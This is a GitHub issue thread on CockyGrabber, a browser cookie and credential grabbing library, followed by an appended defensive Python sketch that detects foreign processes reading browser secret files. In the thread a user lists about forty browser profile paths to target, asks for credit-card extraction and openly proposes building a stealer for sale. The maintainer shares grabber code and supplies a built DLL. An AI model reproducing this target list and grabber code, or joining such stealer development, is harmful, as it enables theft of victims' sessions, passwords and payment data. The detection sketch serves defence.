Closed ProrockDev closed 2 years ago
I downloaded Yandex on a virtual machine and analyzed the Local State file with a JSON parser.
I don't see {"checker_state": "counter":0,"encrypted_data":"..."},"encrypted_key". The only thing that is in my os_crypt object is encrypted_key.
Possibly different browser versions. But I have the way I described above and your regular expression does not work. Please fix the problem, or make the GetKey() method virtual so that I can inherit it and override it.
I'm also wondering when the next updates will be.
Possibly different browser versions
What version do you use?
[...] or make the GetKey() method virtual so that I can inherit it and override it
That's a good idea. I'll try to fix the problem myself but I also will make the method virtual.
I'm also wondering when the next updates will be
The main reason why it's taking so long is because of the custom SQLite reader. The newest version right now (2.3) is using System.Data.SQLite. I planned to add an SQLiteReader class that can read databases without any references. I've had a lot of problems with it and needed to learn the SQLite file format. And until now there are still some bugs that I would like to fix first before I'm gonna release it.
Can you release v2.3.1 with the GetKey() virtual method?
Ok I'm gonna try to release it later
Also, maybe you should add functionality first, like credit cards? And only then write custom Sqlite libraries?
Also, maybe you should not create separate classes for each browser, but make an automatic search for browsers in UniversalGrabber? Here are the main
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Google\Chrome\User Data"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Battle.net"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Chromium\User Data"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Google(x86)\Chrome\User Data"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Roaming\Opera Software\Opera GX Stable"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Roaming\Opera Software\Opera Stable"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\MapleStudio\ChromePlus\User Data"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Iridium\User Data"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\7Star\7Star\User Data"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\CentBrowser\User Data"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Chedot\User Data"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Vivaldi\User Data"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Kometa\User Data"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Elements Browser\User Data"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Epic Privacy Browser\User Data"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\uCozMedia\Uran\User Data"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\CatalinaGroup\Citrio\User Data"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Coowon\Coowon\User Data"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\liebao\User Data"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\QIP Surf\User Data"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Orbitum\User Data"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Comodo\Dragon\User Data"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Amigo\User\User Data"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Torch\User Data"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Yandex\YandexBrowser\User Data"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Comodo\User Data"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\360Browser\Browser\User Data"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Maxthon3\User Data"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\K-Melon\User Data"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Sputnik\Sputnik\User Data"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Nichrome\User Data"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\CocCoc\Browser\User Data"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Uran\User Data"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Chromodo\User Data"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Mail.Ru\Atom\User Data"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\BraveSoftware\Brave-Browser\User Data"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Microsoft\Edge\User Data"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\NVIDIA Corporation\NVIDIA GeForce Experience"),
    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\CryptoTab Browser\User Data")
Search for these directories. If the directory exists, find Local State and other files in it
I don't think it's a good way to find those. I like clean code so I prefer classes for different Browsers.
Currently, the UniversalGrabber has a good algorithm in my opinion:
    private readonly BlinkGrabber[] BlinkGrabbers =
    {
        new ChromeGrabber(),
        new BraveGrabber(),
        new VivaldiGrabber(),
        new OperaGrabber(),
        new OperaGxGrabber(),
        new EdgeGrabber(),
    };
    private readonly GeckoGrabber[] GeckoGrabbers =
    {
        new FirefoxGrabber(),
    };
    public IEnumerable<Blink.Cookie> GetAllBlinkCookies()
    {
        List<Blink.Cookie> cookies = new List<Blink.Cookie>();
        foreach (BlinkGrabber g in BlinkGrabbers)
        {
            // Add Cookies to list:
            if (g.CookiesExist())
                cookies.AddRange(g.GetCookies());
        }
        return cookies;
    }
I just need to add more Browsers to the Array and that's it. The UniversalGrabber already checks if the Cookies and such exist. (There isn't currently an if statement that checks if the key exists. I need to add that but everything else works fine)
I wrote a new regex expression: regexr.com/6m4ll
Can you paste the content of the Local State file in it and see if "os_crypt": {"encrypted_key": "..."} is blue (is matched)?
Can you also click on the match and go to details?
The encrypted_key should be in the 'encKey' row.
Indeed, the regular expression works. But why not do a simple JSON parse? Please release an update so I can download the .dll. Can I find out an approximate time when credit cards will be parsed? You would not like to participate in writing a stealer for the purpose of further sale. Together it would be faster to write code.
Indeed, the regular expression works. But why not do a simple JSON parse?
unnecessary. It's faster to do a simple regex replace instead of loading a JsonSerializer class that takes space in memory.
Please release an update so I can download the .dll
If you need it that much then you can build the project yourself
Can I find out an approximate time when credit cards will be parsed?
probably until v2.4
You would not like to participate in writing a stealer for the purpose of further sale. Together it would be faster to write code.
idk. I can't be sure that you aren't a skid. I encountered a lot of those.
Can we continue communication in Jabber or Telegram?
Can we continue communication in Jabber or Telegram?
Idk what Jabber is and i got banned from telegram lmao
Jabber is an xampp client
Or name another client in which you can safely conduct correspondence, we will continue communication there
Or name another client in which you can safely conduct correspondence, we will continue communication there
I would suggest discord. I don't think we are going to be targeted by the FBI for talking lol.
btw I've built a DLL for you: CockyGrabber.zip. It should work. If not tell me.
Everything works, thank you. Cookies are parsed successfully. Only passwords in this browser are encrypted somehow differently, I have not figured it out yet. It is quite popular in the CIS. I'll contact you on Discord soon.
Google Chrome Local State: "os_crypt":{"encrypted_key":
YandexBrowser Local State: "os_crypt":{"checker_state": "counter":0,"encrypted_data":"blabla="},"encrypted_key":
The regular expression in the GetKey() method is written incorrectly. Might be worth using json decoding to solve this.
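
Added example, not part of the thread or of the CockyGrabber project: a detection sketch for the behaviour discussed above, where one process opens Local State, Cookies or the password store under several browsers' User Data directories. The event field names follow Windows object-access audit records (Event ID 4663); the expected image paths, the sample events and the "Login Data" file name are assumptions added here.

```python
import ntpath

# Secret-bearing files: "Local State" and "Cookies" come from the thread;
# "Login Data" (Chromium's password store) is added here.
SENSITIVE_FILES = {"local state", "cookies", "login data"}

# Profile root (from the thread's directory list) -> image path suffix that is
# expected to open it. The image paths are assumptions about default installs.
EXPECTED_IMAGE = {
    r"\appdata\local\google\chrome\user data": r"\google\chrome\application\chrome.exe",
    r"\appdata\local\microsoft\edge\user data": r"\microsoft\edge\application\msedge.exe",
    r"\appdata\local\yandex\yandexbrowser\user data": r"\yandex\yandexbrowser\application\browser.exe",
}

def foreign_access(event):
    """Return the profile root if a non-owning image touched a secret file, else None."""
    path = event["object_name"].lower()
    if ntpath.basename(path) not in SENSITIVE_FILES:
        return None
    for root, image in EXPECTED_IMAGE.items():
        if root + "\\" in path:
            return None if event["process_name"].lower().endswith(image) else root
    return None

def find_sweeps(events, min_roots=2):
    """Group foreign accesses by process; report those spanning several browsers."""
    seen = {}
    for ev in events:
        root = foreign_access(ev)
        if root:
            seen.setdefault((ev["pid"], ev["process_name"]), set()).add(root)
    return {proc: sorted(roots) for proc, roots in seen.items() if len(roots) >= min_roots}

# Constructed sample events, shaped like the ProcessName/ObjectName fields of
# Windows object-access audit records (Event ID 4663). Not real telemetry.
U = r"C:\Users\alice\AppData\Local"
SAMPLE = [
    {"pid": 4120, "process_name": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "object_name": U + r"\Google\Chrome\User Data\Local State"},
    {"pid": 7788, "process_name": U + r"\Temp\updater.exe",
     "object_name": U + r"\Google\Chrome\User Data\Local State"},
    {"pid": 7788, "process_name": U + r"\Temp\updater.exe",
     "object_name": U + r"\Google\Chrome\User Data\Default\Network\Cookies"},
    {"pid": 7788, "process_name": U + r"\Temp\updater.exe",
     "object_name": U + r"\Yandex\YandexBrowser\User Data\Local State"},
    {"pid": 900, "process_name": U + r"\Temp\chrome.exe",
     "object_name": U + r"\Microsoft\Edge\User Data\Default\Login Data"},
]

if __name__ == "__main__":
    for proc, roots in find_sweeps(SAMPLE).items():
        print(proc, roots)
```

Matching on the full image path rather than the file name means a binary named chrome.exe running from Temp is still treated as foreign; lowering `min_roots` to 1 also surfaces single-browser access.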